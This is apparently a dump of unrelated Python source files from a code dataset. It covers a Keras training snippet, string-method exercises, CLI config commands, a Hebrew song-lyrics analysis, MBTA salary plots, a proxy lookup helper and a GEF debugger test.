              loss='categorical_crossentropy',
              metrics=['accuracy'])
model.fit(x_train, y_train,
          batch_size=batch_size,
          epochs=training_iters,
          verbose=1,
          validation_data=(x_test, y_test),
          callbacks=[TensorBoard(log_dir='./logs/keras_mnist_lstm/')])
scores = model.evaluate(x_test, y_test, verbose=0)
print('LSTM test score:', scores[0])
print('LSTM test accuracy:', scores[1]) |
990,929 | 6875b4aafa85198e6be282a9db46dfbf1b863533 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2018/3/29 20:56
# @Author : lingxiangxiang
# @File : demon1.py
'''
This is a test program.
'''
"""
hello world
"""
# Java and C require declaring a variable before assigning it, e.g.:
# int a; a = 10;
a = 10
b = "hello world"
c = 11.961
d = True
print(type(a))
print(type(b))
print(type(c))
print(type(d))
print(int(c))
print(round(c, 1))
# Commonly used string methods:
# strip             removes leading and trailing whitespace only
# replace(old, new) replaces occurrences of old with new
# find(sub)         returns the index of sub if found, otherwise -1
# format            string formatting
# split             splits the string into a list
print(" a1 b 2c3d4".strip())
print("a1b1c1d1".split("1"))
print("asdfasjdfas".startswith("asd"))
name = "lingxiangxiang"
shang = 18
print("hello " + name)
print("%s's age is: %d" %(name, shang))
str1 = "a1b1c1d1"
print(str1[0])
print(str1[1])
print(str1[2])
print(str1[3])
print(str1[4])
print(str1[5])
a = ["a", "b", "c", "d", "e"]
print("------".join(a))
print(a)
"".split()
a = "a1b2c3d4"
print(a)
|
990,930 | 0e6551ca9068693ab96f952490133763937b7ad8 | # vi: ts=8 sts=4 sw=4 et
#
# config.py: config commands
#
# This file is part of Draco2. Draco2 is free software and is made available
# under the MIT license. Consult the file "LICENSE" that is distributed
# together with this file for the exact licensing terms.
#
# Draco2 is copyright (c) 1999-2007 by the Draco2 authors. See the file
# "AUTHORS" for a complete overview.
#
# $Revision: $
from draco2.core.model import Config
from draco2.command.command import Command
class SetConfig(Command):
    """Set a configuration key."""

    name = 'set'
    description = 'create a config item'
    usage = '%prog [options] %command <key> <value>'
    nargs = 2

    def run(self, opts, args, api):
        # Update the key in place when it already exists, otherwise insert
        # a new Config row; either way commit the transaction at the end.
        key, value = args
        model = api.models.model('draco')
        transaction = model.transaction()
        configs = transaction.select(Config, 'key = %s', (key,))
        if configs:
            config = configs[0]
            config['value'] = value
        else:
            config = Config(key=key, value=value)
            transaction.insert(config)
        transaction.commit()
class DeleteConfig(Command):
    """Delete a configuration key."""

    name = 'delete'
    description = 'delete a config item'
    usage = '%prog [options] %command <key>'
    nargs = 1

    def run(self, opts, args, api):
        # Remove the key; report and exit with status 1 when it is absent.
        key = args[0]
        model = api.models.model('draco')
        transaction = model.transaction()
        configs = transaction.select(Config, 'key = %s', (key,))
        if not configs:
            self.error('configuration key "%s" does not exist' % key)
            self.exit(1)
        transaction.delete(configs[0])
        transaction.commit()
class ListConfig(Command):
    """List all configuration keys."""

    name = 'list'
    description = 'list all config items'

    def run(self, opts, args, api):
        # Print every key/value pair, one per line.
        model = api.models.model('draco')
        transaction = model.transaction()
        configs = transaction.select(Config)
        for config in configs:
            self.write('-> %s = %s\n' % (config['key'], config['value']))
class ConfigCommand(Command):
    """Top-level `config` command grouping the set/delete/list subcommands."""

    name = 'config'
    description = 'manage configuration'

    def __init__(self):
        super(ConfigCommand, self).__init__()
        for subcommand in (SetConfig(), DeleteConfig(), ListConfig()):
            self.add_subcommand(subcommand)
|
990,931 | d4aaa8f38a25121e2e122bc58aa3266edb316a6c | import re
from typing import List, Tuple, Set
from collections import Counter, defaultdict
import numpy as np
import pandas as pd
from tqdm import tqdm
import seaborn as sns
from click import secho
import stanza as stanza
import matplotlib.pyplot as plt
from datasets import load_dataset
from pandas import DataFrame, Series
from pandas.core.strings import StringMethods
from sklearn import tree
from sklearn.metrics import accuracy_score
from sklearn.naive_bayes import MultinomialNB
from sklearn.model_selection import train_test_split
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.tree import DecisionTreeClassifier, export_text
from model_evaluater import evaluate
# Decade bucket lower bounds used throughout the analysis.
DECADES = [1970, 1980, 1990, 2000, 2010, 2020]
EPOCHS = 3
# Years of Israeli wars, used by the sentiment-vs-war analysis.
ISRAEL_WARS = ['1973', '1982','2006', '2008', '2012', '2014', '2021']
class Emotions:
    """Integer codes used in the ``song_sentiment`` column."""
    norm = 0
    happy = 2
    sad = 1
class HebrewSongs:
    def __init__(self, path: str = 'data/tagged_data.tsv', normalize_rymes: bool = False):
        # NOTE(review): the tab separator is passed positionally, which
        # newer pandas versions reject -- prefer an explicit sep keyword.
        self.data: DataFrame = pd.read_csv(path, '\t')
        # Bucket each parseable year into its decade; unparseable years get 0.
        self.data['decade'] = [int(int(year) / 10) * 10 if type(year) != float and year.isdigit() else 0 for year in self.data["year"]]
        # Song length in words (split on single spaces).
        self.data['lyrics_len'] = [len(lyric.split(' ')) for lyric in self.data['lyrics']]
        self.stop_words: List[str] = HebrewSongs.get_stop_words('stopwords.txt')
        self.stop_words_n_grams_2: List[str] = HebrewSongs.get_stop_words('stopwords_ngrams_2.txt')
        self.add_name_in_song()
        self.add_rhymes(normalize=normalize_rymes)
        # Convenience view holding only the songs flagged as hits.
        self.data_hits = self.data[self.data['hit'] == 1]
    def add_colmn(self):
        # Attach the precomputed per-song sentiment codes (comma-separated
        # ints in emotions.txt) and persist the enriched table.
        with open('emotions.txt', 'r') as f:
            emotions_str = f.read().split(',')
        emotions_int = list(map(lambda x: int(x), emotions_str))
        self.data['song_sentiment'] = emotions_int
        self.data.to_csv('data/tagged_data.tsv', sep='\t')
def get_decade(self, decade: int) -> DataFrame:
if decade not in DECADES:
secho(f"[ERROR] decade ({decade}) should be one of the following:", fg="red", bold=True)
secho(f" {DECADES}", fg="red")
exit(1)
return self.data.loc[(int(self.data['year']) >= decade) & (int(self.data['year']) <= (decade + 9))]
def get_year(self, year: int) -> DataFrame:
return self.data.loc[self.data['year'] == year]
    def get_artists_gender(self, hits=False):
        """Stacked-bar plot of the artist-gender share per decade
        (optionally restricted to hits)."""
        # Gender codes used in the ``gender`` column.
        male = 0
        female = 1
        band = 2
        mans = []
        females = []
        bands = []
        for decade in DECADES[:-1]:
            data = self.data[self.data['decade'] == decade]
            if hits:
                data = data[data['hit'] == 1]
            # Normalized counts -> percentage share per gender.
            gender_in_hist = data['gender'].value_counts(normalize=True)
            mans.append(gender_in_hist[male] * 100)
            females.append(gender_in_hist[female] * 100)
            bands.append(gender_in_hist[band] * 100)
        p1 = plt.bar(DECADES[:-1], mans, 2, color='dodgerblue', label='man singers')
        p2 = plt.bar(DECADES[:-1], females, 2, bottom=mans, color='deeppink', label='women singers')
        p3 = plt.bar(DECADES[:-1], bands, 2,
                     bottom=np.array(mans) + np.array(females), color='orange', label="bands")
        if not hits:
            plt.title('gender of artists')
        else:
            plt.title('gender of artists in hits')
        plt.xlabel('decade')
        plt.ylabel('precentage of singing gender')
        plt.legend()
        plt.show()
def get_lyrics(self, df: DataFrame = DataFrame()):
all_lyrics: Series = self.data["lyrics"] if df.empty else df["lyrics"]
all_lyrics_str: StringMethods = all_lyrics.str
words: Series = all_lyrics_str.split()
words: List[List[str]] = words.values.tolist()
return [word for i in words for word in i]
    def get_most_common(self, n: int, decade: int = None, use_stopwords: bool = True):
        """Bar-plot the n most frequent words of one decade, optionally
        filtering out stop words."""
        corpus: List[str] = self.get_lyrics(self.data[self.data['decade'] == decade])
        counter = Counter(corpus)
        most = counter.most_common()
        x, y = [], []
        # Collect words until n survive the (optional) stop-word filter.
        for word, count in most:
            if use_stopwords:
                if word not in self.stop_words:
                    x.append(word)
                    y.append(count)
            else:
                x.append(word)
                y.append(count)
            if len(x) == n:
                break
        # Words are reversed for right-to-left Hebrew display.
        sns.barplot(x=y, y=HebrewSongs.invert_words(x), palette='Paired')
        plt.show()
    def get_emotions_to_wars_plot(self):
        """Compare the share of sad songs in war years vs. all other years."""
        sad_songs = []
        happy_songs = []
        # A war's impact is assumed to carry into the following year as well.
        ISRAEL_WARS_plus_1 = [str(int(year)+1) for year in ISRAEL_WARS]
        for year in ['sad_years', 'non_sad']:
            if year == 'sad_years':
                decade_data = self.data[self.data['year'].isin(ISRAEL_WARS+ISRAEL_WARS_plus_1)]
            else:
                # NOTE(review): unary ``-`` on a boolean Series is deprecated
                # in pandas; ``~`` is the supported inversion operator.
                decade_data = self.data[-self.data['year'].isin(ISRAEL_WARS+ISRAEL_WARS_plus_1)]
            count_values = decade_data["song_sentiment"].value_counts(normalize=True)
            sad_songs.append(count_values[Emotions.sad])
            happy_songs.append(count_values[Emotions.happy] + count_values[Emotions.norm])
        n = 2
        r = np.arange(n)
        width = 0.25
        plt.bar(r, sad_songs, color='#a3ff58',
                width=width, edgecolor='black',
                label='sad songs')
        plt.ylabel("songs emotion ")
        plt.title("songs sentiment in war years")
        plt.xticks(r + width / 2, ['war years', 'not war years'])
        plt.legend()
        plt.show()
    def get_emotions_plot(self, hits: bool = False):
        """Grouped-bar plot of song sentiment split by artist gender.

        NOTE(review): when ``hits`` is True this permanently replaces
        ``self.data`` with the hits-only subset -- confirm that side effect
        is intended.
        """
        # Gender codes used in the ``gender`` column.
        male = 0
        female = 1
        band = 2
        sad_songs = []
        happy_songs = []
        normal_songs = []
        if hits:
            self.data = self.data[self.data['hit'] == 1]
        for gender in [male, female, band]:
            decade_data = self.data[self.data["gender"] == gender]
            count_values = decade_data["song_sentiment"].value_counts(normalize=True)
            sad_songs.append(count_values[Emotions.sad])
            happy_songs.append(count_values[Emotions.happy])
            normal_songs.append(count_values[Emotions.norm])
        n = 3
        r = np.arange(n)
        width = 0.2
        plt.bar(r, sad_songs, color='#a3ff58',
                width=width, edgecolor='black',
                label='sad songs')
        plt.bar(r + 2*width, happy_songs, color='#ff58a3',
                width=width, edgecolor='black',
                label='happy songs')
        plt.bar(r + width, normal_songs, color='#D3D3D3',
                width=width, edgecolor='black',
                label='normal songs')
        plt.xlabel("Gender")
        plt.ylabel("songs emotion ")
        plt.title(f"songs sentiment vs gender {'(hits)' if hits else ''}")
        plt.xticks(r + width / 2, ['male', 'female', 'band'])
        plt.legend()
        plt.show()
    def get_song_length_from_years(self):
        """Bar plot of the mean song length (in words) per decade after 1960."""
        # NOTE(review): both columns below are already computed in __init__;
        # this recomputation looks redundant.
        self.data['lyrics_len'] = [len(lyric.split(' ')) for lyric in self.data['lyrics']]
        self.data['decade'] = [int(int(year) / 10) * 10 if type(year) != float and year.isdigit() else 0 for year in
                               self.data["year"]]
        length_from_years = self.data[["lyrics_len", "decade"]].groupby("decade").mean()
        x, y = [], []
        for year, length in length_from_years.iterrows():
            # Skip the 0 bucket (unparseable years) and anything pre-1970.
            if year <= 1960:
                continue
            x.append(str(year))
            y.append(length[0])
        width = 0.4
        barlist = plt.bar(np.arange(len(y)), y, width=width)
        # One fixed colour per decade bar.
        for i, color in enumerate(["#2AC3FF", "#FF2A7C", "#FF632A", "#FFC32A", "#DFFF2A", "#b9e769"]):
            barlist[i].set_color(color)
        plt.xlabel("Decade")
        plt.ylabel("Average length of songs")
        plt.title("decade vs length of songs")
        plt.xticks(np.arange(len(y)), x)
        plt.legend()
        plt.show()
def get_ngram_most_common(self, n: int, df: DataFrame = DataFrame(), decade=None, ngram_range: tuple = (3, 4), show=True):
data = self.data
if decade is not None:
data = self.data[self.data['decade'] == decade]
all_lyrics: Series = data["lyrics"] if df.empty else df["lyrics"]
vec = CountVectorizer(ngram_range=ngram_range, lowercase=True, binary=True).fit(all_lyrics)
bag_of_words = vec.transform(all_lyrics)
sum_words = bag_of_words.sum(axis=0)
words_freq = [(word, sum_words[0, idx])
for word, idx in vec.vocabulary_.items()
if word not in self.stop_words_n_grams_2]
top_n_bigrams: List[Tuple[str]] = sorted(words_freq, key=lambda x: x[1], reverse=True)[:n]
x, y = map(list, zip(*top_n_bigrams))
sns.barplot(x=y, y=HebrewSongs.invert_words(x))
if show:
plt.title(decade if decade else "")
plt.xlabel("תורידת")
plt.show()
return x
def uniqe_ngram_per_decade(self, ngram_range=(3,4)):
decades_words = {}
for decade in DECADES:
m = self.get_ngram_most_common(15, decade=decade, ngram_range=ngram_range, show=False)
decades_words[decade] = m
uniqe_per_decade = {}
for decade in DECADES:
words = decades_words[decade]
uniwq_words = []
for word in words:
seen = False
for d in DECADES:
if d != decade:
if word in decades_words[d]:
seen = True
if not seen:
uniwq_words.append(word)
uniqe_per_decade[decade] = uniwq_words
for k,v in uniqe_per_decade.items():
secho(f"{k}: ", fg='blue', bold=True, nl=False)
secho(f"{', '.join(HebrewSongs.invert_words(v))}", fg='blue')
return uniqe_per_decade
def print_number_bits(self):
for decade in DECADES:
print(f"decade = {decade}")
self.get_number_bits(decade=decade)
def get_number_bits(self, decade):
lyrics = self.data[self.data['decade'] == decade]['lyrics']
lyrics_len = 0
for l in lyrics:
lyrics_len += len(l.split('\n\n'))
print(f"lyrics avrage = {lyrics_len / len(lyrics)}")
def analyze_song_sintiment(self):
from alephBERT import predict_single_text_with_norm
songs_sentiment = []
for _, row in tqdm(self.data.iterrows()):
lyrics = row['lyrics']
song_lines = get_songs_lines(lyrics)
all_song = []
for line in song_lines:
prediction = predict_single_text_with_norm(self.bert_classifier, line, 0.3, 0.8)
all_song.append(prediction)
if all_song.count(Emotions.sad) / len(all_song) > 0.2:
song_sentiment = Emotions.sad
elif all_song.count(Emotions.happy) / len(all_song) > 0.9:
song_sentiment = Emotions.happy
else:
song_sentiment = Emotions.norm
songs_sentiment.append(song_sentiment)
self.data['song_sentiment'] = songs_sentiment
self.data.to_csv('data/tagged_data.tsv', sep='\t')
def words_more_then(self, num_times=100):
words_dict = defaultdict(int)
freq_words = set()
for _, row in self.data.iterrows():
lyrics = row['lyrics']
song_words = lyrics.split(' ')
for word in song_words:
words_dict[word] += 1
for word, num in words_dict.items():
if num > num_times:
freq_words.add(word)
return freq_words
def add_name_in_song(self, num_times: int = 200):
name_in_song = []
freq_words = self.words_more_then(num_times)
for _, row in self.data.iterrows():
first_name = row['artist_name'].split()[0]
lyrics = row['lyrics']
if first_name not in freq_words:
name_in_song.append(first_name in lyrics.split(' '))
else:
name_in_song.append(False)
self.data['artist_name_in_song'] = name_in_song
def plot_name_in_song(self):
a = self.data[["artist_name_in_song", "decade"]].groupby("decade").mean()
plt.plot(DECADES, [a['artist_name_in_song'][decade] for decade in DECADES])
plt.title('artist name in a song')
plt.xlabel('decade')
plt.ylabel('num of songs with singer names in the song / total')
plt.legend()
plt.show()
def guess_from_words(self, artists_list, feture):
learn_feature = feture
learn_artists = self.data[self.data[learn_feature].isin(artists_list)]
train, test = train_test_split(learn_artists, test_size=0.2)
X = train["lyrics"]
Xtest = test["lyrics"]
vectorizer = CountVectorizer()
X_train = vectorizer.fit_transform(X)
X_test = vectorizer.transform(Xtest)
y_test = test[learn_feature]
y_train = train[learn_feature]
decision_tree = DecisionTreeClassifier(random_state=0, max_depth=4)
decision_tree = decision_tree.fit(X_train, y_train)
tree_text = export_text(decision_tree, feature_names=[HebrewSongs.invert_words(word) for word in vectorizer.get_feature_names()])
res_pred = decision_tree.predict(X_test)
score = accuracy_score(y_test, res_pred)
decision_tree.score(X_test, y_test)
print(tree_text)
print(score)
def split_for_test(self, artists_list, feature_check_name='artist_name'):
learn_feature = feature_check_name
know_featurs = ['hit', 'year', 'lyrics_len', 'song_sentiment', "artist_name_in_song", 'artist_name', 'gender']
# know_featurs = ['hit', 'lyrics_len', 'song_sentiment', 'artist_name']
if learn_feature in know_featurs:
know_featurs.remove(learn_feature)
# gapminder.year.isin(years)
learn_artists = self.data[self.data[feature_check_name].isin(artists_list)]
# print(learn_artists['artist_name'].value_counts())
X = learn_artists[know_featurs]
train, test = train_test_split(learn_artists, test_size=0.2)
# X = self.data["lyrics"]
# vectorizer = CountVectorizer()
# X_train = vectorizer.fit_transform(X)
X_train = train[know_featurs]
X_test = test[know_featurs]
y_test = test[learn_feature]
y_train = train[learn_feature]
return X_train, X_test, y_test, y_train, know_featurs
def guess_the_artist(self, artists_list, feature_check_name='artist_name'):
X_train, X_test, y_test, y_train, know_featurs = self.split_for_test(artists_list, feature_check_name)
decision_tree = DecisionTreeClassifier(random_state=0, max_depth=4)
decision_tree = decision_tree.fit(X_train, y_train)
tree_text = export_text(decision_tree, feature_names=know_featurs)
res_pred = decision_tree.predict(X_test)
score = accuracy_score(y_test, res_pred)
decision_tree.score(X_test, y_test)
print(tree_text)
# print(score)
def predict_with_mnb(self, artists_list, feature_check_name='artist_name'):
X_train, X_test, y_test, y_train, know_featurs = self.split_for_test(artists_list, feature_check_name)
mnb = MultinomialNB()
mnb.fit(X_train, y_train)
mnb_prediction = mnb.predict(X_test)
y_test = np.array(y_test)
evaluate(mnb_prediction, y_test)
def learn_from_lyrics(self):
self.data['decade'] = [int(int(year) / 10) * 10 if type(year) != float and year.isdigit() else 0 for year in self.data["year"]]
self.data = self.data[self.data["decade"] >= 1970]
X = self.data["lyrics"]
y = self.data["decade"]
vectorizer = CountVectorizer()
mnb = MultinomialNB()
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)
X_train = vectorizer.fit_transform(X_train)
mnb.fit(X_train, y_train)
X_test = vectorizer.transform(X_test)
y_test = np.array(y_test)
mnb_prediction = mnb.predict(X_test)
evaluate(mnb_prediction, y_test)
return X_train, X_test, y_train, y_test, vectorizer
def learn_decade(self,learn_feature='gender'):
X = self.data[['hit', 'decade', 'lyrics_len']]
# X = self.data["lyrics"]
vectorizer = CountVectorizer()
# X_train = vectorizer.fit_transform(X)
X_train = X
featurs = ['hit', 'decade', 'lyrics_len']
y = self.data[learn_feature]
decision_tree = DecisionTreeClassifier(random_state=0, max_depth=3)
decision_tree = decision_tree.fit(X_train, y)
r = export_text(decision_tree, feature_names=featurs)
res_pred = decision_tree.predict(X)
score = accuracy_score(y, res_pred)
decision_tree.score(X_train, y)
print(r)
print(score)
tree.plot_tree(decision_tree, feature_names=featurs)
plt.show()
def write_measure_of_sadness_and_joy(self, bert_classifier):
from alephBERT import predict_single_text_with_norm
happiest_scores = []
saddest_scores = []
for _, row in tqdm(self.data.iterrows()):
song_lines = get_songs_lines(row['lyrics'])
all_song = [predict_single_text_with_norm(bert_classifier, line, 0.3,0.8) for line in song_lines]
happiest_score = all_song.count(Emotions.happy) / len(all_song)
saddest_score = all_song.count(Emotions.sad) / len(all_song)
happiest_scores.append(happiest_score)
saddest_scores.append(saddest_score)
self.data['happiest_score'] = happiest_scores
self.data['saddest_score'] = saddest_scores
self.data.to_csv('data/tagged_data__new.tsv', sep='\t')
def add_rhymes(self, normalize: bool = False):
rhymes = []
for _, row in tqdm(self.data.iterrows()):
song_lines = get_songs_lines(row['lyrics'])
current_rhymes_sequence = 0
total_rhymes_sequence = 0
for i in range(1, len(song_lines)):
last_line = song_lines[i-1].replace(",","").replace(".","").strip()
current_line = song_lines[i].replace(",","").replace(".","").strip()
if last_line and current_line and last_line[-2:] == current_line[-2:]:
current_rhymes_sequence += 1
else:
total_rhymes_sequence += current_rhymes_sequence
current_rhymes_sequence = 0
rhymes.append(total_rhymes_sequence / (len(song_lines) if normalize else 1))
self.data['rhymes'] = rhymes
def plot_rymes(self):
a = model.data.groupby('decade')["rhymes"].mean()
x_deta = []
y_deta = []
for x,y in a.items():
if 1970<=float(x)<=2020:
x_deta.append(y)
y_deta.append(float(x))
plt.plot(y_deta,x_deta)
plt.title(f"Average number of rymes vs decade")
plt.xlabel(f"Decade")
plt.ylabel(f"Average number of rymes in song")
plt.show()
def get_most_happiest_songs(self,number_of_happy_songs=10):
data = self.data.sort_values("happiest_score", ascending=False)
happiest_songs = []
for _, row in tqdm(data.iterrows()):
# curr_score = row['happiest_score'] / len(row['lyrics'].split())
curr_score = row['happiest_score']
happiest_songs.append((row, curr_score))
happiest_songs = sorted(happiest_songs, key=lambda x: x[1], reverse=True)
print(happiest_songs[:number_of_happy_songs])
return happiest_songs[:number_of_happy_songs]
def get_most_saddest_songs(self, number_of_sad_songs=10):
data = self.data.sort_values("saddest_score", ascending=False)
saddest_songs = []
for _, row in tqdm(data.iterrows()):
curr_score = row['saddest_score'] / len(row['lyrics'].split())
saddest_songs.append((row, curr_score))
saddest_songs = sorted(saddest_songs, key=lambda x: x[1], reverse=True)
print(saddest_songs[:number_of_sad_songs])
return saddest_songs[:number_of_sad_songs]
@staticmethod
def get_stop_words(path: str) -> Set[str]:
with open(path, 'r', encoding='utf8') as f:
return set(f.read().split('\n'))
@staticmethod
def invert_words(words):
return [w[::-1] for w in words]
def write_test_and_train_csv():
    """Export the 'hebrew_sentiment' dataset to per-split CSV files.

    Keeps only short (< 120 chars after comma removal), non-neutral
    (label != 2) examples with emoji stripped, and writes
    data/{split}_sentiment.csv for the test and train splits.
    """
    MAX_LEN_ENCODE = 120
    # Load once: the original re-loaded the whole dataset inside the split
    # loop, doing the download/parse work twice for no reason.
    dataset = load_dataset("hebrew_sentiment")
    for data_type in ["test", 'train']:
        labels = []
        texts = []
        for data in dataset[data_type]:
            text = data["text"].replace(',', '')
            if len(text) < MAX_LEN_ENCODE and int(data["label"]) != 2:
                labels.append(data["label"])
                texts.append(deEmojify(text))
        df = pd.DataFrame({'label': labels, 'text': texts}, columns=['label', 'text'])
        df.to_csv(f'data/{data_type}_sentiment.csv')
def deEmojify(text):
    """Strip common emoji/pictograph characters from *text* and return the result."""
    emoji_character_class = ("["
                             u"\U0001F600-\U0001F64F"  # emoticons
                             u"\U0001F300-\U0001F5FF"  # symbols & pictographs
                             u"\U0001F680-\U0001F6FF"  # transport & map symbols
                             u"\U0001F1E0-\U0001F1FF"  # flags (iOS)
                             "]+")
    return re.compile(emoji_character_class, flags=re.UNICODE).sub('', text)
def get_songs_lines(song) -> List[str]:
    """Split *song* on newlines and return only the non-empty lines."""
    return [line for line in song.split('\n') if line != '']
if __name__ == '__main__':
    # Entry point: build the model, then run the lyrics-based decade
    # classifier.  The commented lines below are the other analyses from the
    # project, kept for convenient toggling.
    # pass
    model = HebrewSongs()
    # model.get_artists_gender(hits=True)
    # model.get_artists_gender()
    # model.get_ngram_most_common(20, ngram_range=(2, 2), decade=1970)
    # for dacade in [1970, 1980, 1990, 2000, 2010, 2020]:
    #     model.get_ngram_most_common(20, ngram_range=(2, 2), decade=dacade, show=False)
    # model.uniqe_ngram_per_decade(ngram_range=(3,4))
    # model.plot_name_in_song()
    # model.get_song_length_from_years()
    # model.plot_rymes()
    # data = model.data.sort_values("rhymes", ascending=False)
    # i = 0
    # for row in data.iterrows():
    #     print(row)
    #     i += 1
    #     if i == 3:
    #         break
    # model.get_emotions_plot(hits=True)
    # model.get_emotions_to_wars_plot()
    # model.get_most_saddest_songs(number_of_sad_songs=5)
    # model.get_most_happiest_songs(number_of_happy_songs=5)
    # for year in [1970, 1980, 1990, 2000, 2010, 2020]:
    #     mean_happiest = model.data.loc[model.data['decade'] == year]["happiest_score"].mean()
    #     mean_saddest = model.data.loc[model.data['decade'] == year]["saddest_score"].mean()
    #     mean_rhymes = model.data.loc[model.data['decade'] == year]["rhymes"].mean()
    #     secho(f"{year}", fg="blue", bold=True)
    #     secho(f"    Happy mean: {mean_happiest}", fg="blue")
    #     secho(f"    Sad mean: {mean_saddest}", fg="blue")
    #     secho(f"    Rhymes mean: {mean_rhymes}", fg="blue")
    model.learn_from_lyrics()
    # model.guess_the_artist(['הדג נחש' ,'שרית חדד' ,'כוורת' ,'עומר אדם' ,'אייל גולן' ,'נועה קירל'])
|
990,932 | d6c3ceca2e97a6a08f21abdbfb95e421d4cbd588 | ###############################################################################
''''''
###############################################################################
from .. import _classtools
from .._ptolemaic import Ptolemaic as _Ptolemaic
from ._ur import *
from .var import *
from .dat import *
from .seq import *
from .inc import *
from .non import *
###############################################################################
###############################################################################
|
990,933 | 2327b9c1cea89dbadd0d10e009fd4a5144d056a5 | from matplotlib.pyplot import figure
import typing
import pandas
import numpy as np
def doplot(
    data: pandas.DataFrame, ind: np.ndarray, saltype: str, thres: float, ax
) -> typing.Tuple[float, float, float, float, float]:
    """Histogram the selected salaries and return summary statistics.

    Rows are chosen by the boolean mask *ind*; salaries at or below *thres*
    are then dropped (new trainees, arbitrarily chosen threshold).
    Returns (max, median, 90th percentile, total, selected-row count).
    """
    salaries = data['Salary'][ind]
    salaries = salaries[salaries > thres]
    if ax is not None:
        # Plot in units of $1000 for readable axis labels.
        (salaries / 1000).hist(ax=ax, bins=16)
        ax.set_xlim(0, 260)
        ax.set_title(f'{saltype}')
    return (salaries.max(), salaries.median(), salaries.quantile(0.9),
            salaries.sum(), ind.sum())
def summaryplot(fg, ax, st: pandas.DataFrame, data: pandas.DataFrame, year: int):
    """Label the histogram grid for *year* and report the single highest earner."""
    for left_axis in ax[:, 0]:
        left_axis.set_ylabel('Number of occurrences')
    for bottom_axis in ax[1, :]:
        bottom_axis.set_xlabel(f'{year} Salary [$1000 USD]')
    fg.suptitle(f'{year} MBTA salary histograms', fontsize='xx-large')
    fg.tight_layout()
    fg.subplots_adjust(top=0.93)

    top_earner = data.loc[data['Salary'].idxmax(), :]
    top_salary = top_earner['Salary']
    try:
        # Files that carry a projected salary let us estimate overtime;
        # fall back to the plain message when the column is absent.
        estimated_overtime = top_salary - top_earner['ProjSal']
        print(
            f'\nhighest earning MBTA staff ${top_salary:.0f} in {year} was a {top_earner["Title"]},'
            f' including estimated ${estimated_overtime:.0f} overtime.\n'
        )
    except KeyError:
        print(f'\nhighest earning MBTA staff ${top_salary:.0f} in {year} was a {top_earner["Title"]}')
# %%
# Bar chart of salary expenditure per category (excluding the trailing
# total row), in units of $10M.
fg = figure()
ax = fg.gca()
# BUG FIX: `.ix` was removed in pandas 1.0.  For an integer slice `.ix`
# behaved positionally, so `.iloc` preserves the original selection of all
# rows except the last.
(st['subtot'].iloc[:-1] / 1e8).sort_values().plot(kind='bar')
ax.set_ylabel('expenditure [$10M]')
ax.set_title('MBTA {} salary expenditure by category'.format(year))
fg.subplots_adjust(bottom=0.15)
|
990,934 | 30cee57c7d88dbb7fab087338a4797525a2ea4f4 | # -*- coding: utf-8 -*-
import sys
from os.path import basename
from pprint import pprint
from commando import Application, command, subcommand, version, store, true, param
import ROOT as R
from minty.main import make_main
import results
import datasets
import jobs
import plot
import fit
class Engine(Application):
    """commando CLI application that wires the analysis subcommands together."""

    @command(description='Engine - Turbo powered',
             epilog='Use %(prog)s {command} -h to get help on individual commands')
    @version('-v', '--version', version='%(prog)s 0.1')
    @store('-k', '--key', default='.', help="Key to start the engine")
    def main(self, params):
        """
        Will not be executed. A sub command is required. This function exists to provide
        common parameters for the subcommands and some generic stuff like version and
        metadata
        """
        pass

    # Subcommands re-exported from their implementation modules so commando
    # discovers them as methods of this Application.
    mergeall = results.mergeall
    reduce = results.reduce
    mergereduce = results.mergereduce
    dump = results.dump
    dump_grl = results.dump_grl
    dump_files = results.dump_files
    status = results.status
    kick = results.kick
    logexplore = results.logexplore
    mcupdateinfo = results.mcupdateinfo
    mcrescale = results.mcrescale

    make_datasets = datasets.make_datasets
    dsupdate = datasets.dsupdate
    dsbuild = datasets.dsbuild
    dscheck = datasets.dscheck
    dsdiff = datasets.dsdiff

    submit = jobs.submit

    draw = plot.draw

    multifit = fit.multifit

    @subcommand('browse', help='Start a TBrowser')
    @param('files', nargs="*")
    def browse(self, params):
        """Open each given ROOT file (default: all.root) in a TBrowser, then drop into IPython."""
        # NOTE(review): IPython.Shell is the pre-0.11 IPython API, removed in
        # modern IPython — confirm the pinned IPython version for this project.
        from IPython.Shell import IPShellEmbed as IP
        files = params.files
        if not files:
            files = ["all.root"]
        # Keep the TFile objects referenced so the browsers stay usable.
        all_files = [R.TFile(f) for f in files]
        browsers = [R.TBrowser(f.GetName(), f) for f in all_files]
        # Start ipython
        IP()()
def main():
    """Initialize ROOT with debug logging enabled, then run the CLI application."""
    from logging import DEBUG

    from minty.utils import init_root
    from minty.utils.logger import log_level

    with log_level(DEBUG):
        init_root()
        Engine().run()
|
990,935 | a18d8098d4b87661bff2d12b105abaa3afe9f3d3 | # -*- coding: utf-8 -*-
from With_DB import Mysql_DB
class Proxy(object):
    """Fetches a random HTTP proxy address from the MySQL `proxys` table."""

    def __init__(self):
        # Proxies live in SQL for now; may move to redis-based management later.
        self.db = Mysql_DB()

    def GetIP(self):
        """Return a random proxy formatted as 'http://<ip>', or None on failure."""
        #sql = "SELECT ip, port FROM proxys WHERE id >= ((SELECT MAX(id) FROM proxys)-(SELECT MIN(id) FROM proxys)) * RAND() + (SELECT MIN(id) FROM proxys) LIMIT 1"
        # Picks a pseudo-random row by comparing id against a random offset
        # within the current id range.
        sql = "SELECT ip FROM proxys WHERE id >= ((SELECT MAX(id) FROM proxys)-(SELECT MIN(id) FROM proxys)) * RAND() + (SELECT MIN(id) FROM proxys) LIMIT 1"
        try:
            rows = self.db.Query_MySQL(sql)
            #ip = str(ip_middle[0][0]) + ':' + str(ip_middle[0][1])
            return "http://" + str(rows[0][0])
        except Exception as e:
            print ('读取代理ip错误' + str(e))
|
990,936 | 54b7fdf41babc234a4fec7ca20cf9d8406adef10 | """
GDB function test module for ELF section convenience functions
"""
from tests.utils import _target, gdb_run_cmd, gdb_run_silent_cmd, gdb_start_silent_cmd, is_64b
from tests.utils import GefUnitTestGeneric
class ElfSectionGdbFunction(GefUnitTestGeneric):
    """Tests for GEF's ELF-section convenience functions ($_base, $_bss, $_got, $_heap, $_stack)."""

    def test_func_base(self):
        """`$_base()` GDB function test"""
        cmd = "x/s $_base()"
        # Every section function requires a running inferior.
        self.assertFailIfInactiveSession(gdb_run_cmd(cmd))
        res = gdb_start_silent_cmd(cmd)
        self.assertNoException(res)
        # The base of the mapping must start with the ELF magic bytes.
        self.assertIn("\\177ELF", res)
        addr = res.splitlines()[-1].split()[0][:-1]

